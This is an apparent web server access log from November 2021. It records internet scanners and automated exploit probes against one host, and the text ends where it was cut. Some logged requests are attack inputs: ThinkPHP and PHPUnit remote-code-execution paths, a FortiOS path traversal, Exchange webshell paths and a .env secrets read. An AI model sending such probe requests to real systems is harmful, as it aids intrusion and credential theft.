"/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Nov/2021:20:32:23 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.195.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Nov/2021:20:46:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Nov/2021:21:15:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.149.192.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" "-" [21/Nov/2021:22:02:06 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [21/Nov/2021:22:40:01 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 205.185.115.39] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [21/Nov/2021:23:48:25 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.226] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Nov/2021:00:02:12 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [22/Nov/2021:02:02:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Nov/2021:02:08:03 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 92.118.160.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [22/Nov/2021:02:20:59 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.46.14] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Nov/2021:02:31:14 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.190] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Nov/2021:02:44:07 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.214.143] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Nov/2021:03:51:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [22/Nov/2021:04:37:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.203.228.79] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/55.0.3068.72 Safari/537.32" "-" [22/Nov/2021:04:37:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.203.228.79] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/55.0.3068.72 Safari/537.32" "-" [22/Nov/2021:04:59:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Nov/2021:05:10:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.59] [Length 0] [Gzip -] "-" "-" [22/Nov/2021:05:10:28 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.59] [Length 252] [Gzip -] "-" "-" [22/Nov/2021:05:10:28 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [22/Nov/2021:05:32:39 +0000] 444 - GET https 64.22.31.253 "/AirWatch" [Client 51.158.156.78] [Length 0] [Gzip -] "-" "-" [22/Nov/2021:05:59:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [22/Nov/2021:06:29:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.134.116] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [22/Nov/2021:06:30:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.134.236] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [22/Nov/2021:06:30:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.162.130] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [22/Nov/2021:06:48:53 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.85] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Nov/2021:07:17:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [22/Nov/2021:07:37:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.128] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Nov/2021:08:14:07 +0000] 444 - GET https 64.22.31.253 "/solr/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Nov/2021:08:56:43 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Nov/2021:09:22:31 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [22/Nov/2021:09:22:32 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [22/Nov/2021:09:35:12 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Nov/2021:09:52:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [22/Nov/2021:09:52:18 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211122174927" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [22/Nov/2021:10:03:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.101] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Nov/2021:10:04:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 135.125.188.22] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [22/Nov/2021:10:04:27 +0000] 444 - OPTIONS https localhost "/" [Client 171.25.193.25] [Length 0] [Gzip -] "-" "-" [22/Nov/2021:10:04:28 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 171.25.193.25] [Length 0] [Gzip -] "-" "-" [22/Nov/2021:10:04:29 +0000] 400 - - https localhost "-" [Client 171.25.193.25] [Length 154] [Gzip -] "-" "-" [22/Nov/2021:10:04:36 +0000] 400 - - https localhost "-" [Client 171.25.193.25] [Length 154] [Gzip -] "-" "-" [22/Nov/2021:10:09:35 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.46.14] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Nov/2021:10:27:07 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.163] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [22/Nov/2021:10:34:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.161.246] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Nov/2021:10:39:58 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [22/Nov/2021:11:11:46 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Nov/2021:11:46:13 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Nov/2021:12:05:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Nov/2021:12:20:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.82.47.2] [Length 0] [Gzip -] "-" "-" [22/Nov/2021:12:27:53 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [22/Nov/2021:14:03:52 +0000] 444 - GET https www.99syn.com "/img/ds.png" [Client 199.195.250.138] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36" "https://www.99syn.com" [22/Nov/2021:14:13:35 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Nov/2021:14:45:41 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Nov/2021:15:29:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Nov/2021:15:53:58 +0000] 400 - GET http localhost "/" [Client 165.22.214.85] [Length 252] [Gzip -] "-" "-" [22/Nov/2021:15:55:33 +0000] 444 - GET https localhost "/" [Client 125.64.94.138] [Length 0] [Gzip -] "-" "-" [22/Nov/2021:15:55:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.138] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [22/Nov/2021:15:55:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.138] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [22/Nov/2021:16:21:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.140] [Length 0] [Gzip -] "-" "-" [22/Nov/2021:16:22:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.140] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [22/Nov/2021:16:22:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.140] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [22/Nov/2021:17:31:57 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [22/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Nov/2021:18:04:26 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Nov/2021:18:23:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Nov/2021:20:28:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.120] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Nov/2021:20:32:00 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.209.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Nov/2021:20:33:11 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Nov/2021:21:23:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [22/Nov/2021:21:48:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Nov/2021:22:38:44 +0000] 400 - - http localhost "-" [Client 94.232.46.202] [Length 154] [Gzip -] "-" "-" [22/Nov/2021:23:55:31 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Nov/2021:00:53:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.140.188.2] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [23/Nov/2021:01:04:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Nov/2021:01:13:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.116] [Length 0] [Gzip -] "-" "-" [23/Nov/2021:01:13:20 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.116] [Length 252] [Gzip -] "-" "-" [23/Nov/2021:01:13:20 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [23/Nov/2021:02:34:29 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.212.101] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Nov/2021:03:29:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.44] [Length 0] [Gzip -] "-" "-" [23/Nov/2021:03:29:18 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "-" "-" [23/Nov/2021:03:29:18 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [23/Nov/2021:04:33:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Nov/2021:05:10:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.80.189.57] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [23/Nov/2021:05:50:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 119.61.0.140] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" "-" [23/Nov/2021:05:50:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 119.61.0.140] [Length 654] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" "-" [23/Nov/2021:06:15:37 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 34.77.162.8] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [23/Nov/2021:06:42:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 165.154.6.57] [Length 0] [Gzip -] "-" "-" [23/Nov/2021:06:53:56 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.194.47] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Nov/2021:07:08:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [23/Nov/2021:08:50:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.8] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Nov/2021:08:52:05 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Nov/2021:09:09:38 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Nov/2021:09:09:38 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Nov/2021:09:13:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.82.47.5] [Length 0] [Gzip -] "-" "-" [23/Nov/2021:10:09:18 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Nov/2021:10:15:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.158] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Nov/2021:10:35:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Nov/2021:11:04:55 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Nov/2021:11:16:10 +0000] 444 - POST https 64.22.31.253 "/aspnet_client/system_web/4_0_30319/OutlookIN.aspx" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Nov/2021:11:16:11 +0000] 444 - POST https 64.22.31.253 "/owa/auth/system_web/4_0_30319/OutlookIN.aspx" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Nov/2021:11:16:12 +0000] 444 - POST https 64.22.31.253 "/owa/auth/Current/system_web/4_0_30319/OutlookIN.aspx" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Nov/2021:11:16:12 +0000] 444 - POST https 64.22.31.253 "/owa/auth/Current/scripts/system_web/4_0_30319/OutlookIN.aspx" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Nov/2021:11:16:13 +0000] 444 - POST https 64.22.31.253 "/owa/auth/Current/scripts/premium/system_web/4_0_30319/OutlookIN.aspx" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Nov/2021:11:16:13 +0000] 444 - POST https 64.22.31.253 "/owa/auth/Current/themes/system_web/4_0_30319/OutlookIN.aspx" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Nov/2021:11:16:14 +0000] 444 - POST https 64.22.31.253 "/owa/auth/Current/themes/resources/system_web/4_0_30319/OutlookIN.aspx" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Nov/2021:11:32:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Nov/2021:11:49:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Nov/2021:13:00:15 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [23/Nov/2021:13:50:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Nov/2021:13:58:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [23/Nov/2021:14:01:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Nov/2021:14:16:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Nov/2021:14:22:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.177.49] [Length 0] [Gzip -] "-" "-" [23/Nov/2021:14:22:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 113.31.102.176] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [23/Nov/2021:14:23:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.173.98] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [23/Nov/2021:14:24:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.26.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [23/Nov/2021:15:15:10 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.152.0 Safari/525.19" "-" [23/Nov/2021:15:15:10 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36" "-" [23/Nov/2021:15:15:12 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [23/Nov/2021:16:38:25 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [23/Nov/2021:16:55:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.189.111] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Nov/2021:17:27:45 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.77.162.9] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [23/Nov/2021:18:03:01 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 45.87.61.71] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [23/Nov/2021:18:04:31 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Nov/2021:18:04:31 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Nov/2021:18:04:31 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Nov/2021:18:04:31 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 